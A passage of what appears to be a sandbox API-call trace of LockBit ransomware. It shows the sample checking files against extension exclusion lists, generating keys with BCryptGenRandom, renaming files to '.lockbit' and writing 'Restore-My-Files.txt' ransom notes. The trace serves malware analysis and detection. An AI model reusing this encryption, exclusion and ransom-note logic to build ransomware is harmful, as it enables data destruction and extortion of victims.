(lpString1=".dbv", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.912] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.927] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.927] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.927] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.927] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.927] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00837_.WMF.lockbit") returned 72 [0175.927] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00837_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00837_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.929] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.929] malloc (_Size=0x40068) returned 0x3df0008 [0175.929] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16360) returned 1 [0175.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.931] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.935] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00837_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00837_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.935] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.935] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.937] free (_Block=0x1fa2ed8) [0175.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00837_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.937] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.937] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.937] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1898, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00910_.WMF", cAlternateFileName="")) returned 1 [0175.937] lstrcmpiW (lpString1=".", lpString2="SO00910_.WMF") returned -1 [0175.937] lstrcmpiW (lpString1="..", lpString2="SO00910_.WMF") returned -1 [0175.937] PathFindExtensionW (pszPath="SO00910_.WMF") returned=".WMF" [0175.937] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.937] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.938] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.938] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.939] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00910_.WMF") returned -1 [0175.939] lstrcmpiW (lpString1="ntldr", lpString2="SO00910_.WMF") returned -1 [0175.939] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00910_.WMF") returned -1 [0175.939] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00910_.WMF") returned -1 [0175.939] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00910_.WMF") returned -1 [0175.939] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00910_.WMF") returned 1 [0175.939] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00910_.WMF") returned -1 [0175.940] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.940] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00910_.WMF") returned=".WMF" [0175.940] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.940] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.940] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.941] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.941] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00910_.WMF.lockbit") returned 72 [0175.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00910_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00910_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.942] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.942] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.942] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6296) returned 1 [0175.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.944] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.944] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00910_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00910_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.947] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.947] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.948] free (_Block=0x1fa2ed8) [0175.948] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00910_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.948] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.949] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.949] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x29f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00911_.WMF", cAlternateFileName="")) returned 1 [0175.949] lstrcmpiW (lpString1=".", lpString2="SO00911_.WMF") returned -1 [0175.949] lstrcmpiW (lpString1="..", lpString2="SO00911_.WMF") returned -1 [0175.949] PathFindExtensionW (pszPath="SO00911_.WMF") returned=".WMF" [0175.949] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.949] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.950] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.950] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00911_.WMF") returned -1 [0175.951] lstrcmpiW (lpString1="ntldr", lpString2="SO00911_.WMF") returned -1 [0175.951] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00911_.WMF") returned -1 [0175.951] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00911_.WMF") returned -1 [0175.951] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00911_.WMF") returned -1 [0175.951] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00911_.WMF") returned 1 [0175.951] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00911_.WMF") returned -1 [0175.951] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.951] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00911_.WMF") returned=".WMF" [0175.951] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.951] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.951] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.952] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.953] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00911_.WMF.lockbit") returned 72 [0175.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00911_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00911_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.954] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.954] malloc (_Size=0x40068) returned 0x3df0008 [0175.954] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10744) returned 1 [0175.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.955] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.960] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00911_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00911_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.960] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.960] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.963] free (_Block=0x1fa2ed8) [0175.963] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00911_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.963] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.963] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.963] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x28b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00913_.WMF", cAlternateFileName="")) returned 1 [0175.963] lstrcmpiW (lpString1=".", lpString2="SO00913_.WMF") returned -1 [0175.963] lstrcmpiW (lpString1="..", lpString2="SO00913_.WMF") returned -1 [0175.963] PathFindExtensionW (pszPath="SO00913_.WMF") returned=".WMF" [0175.963] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.963] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.963] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.963] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.963] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".hta", 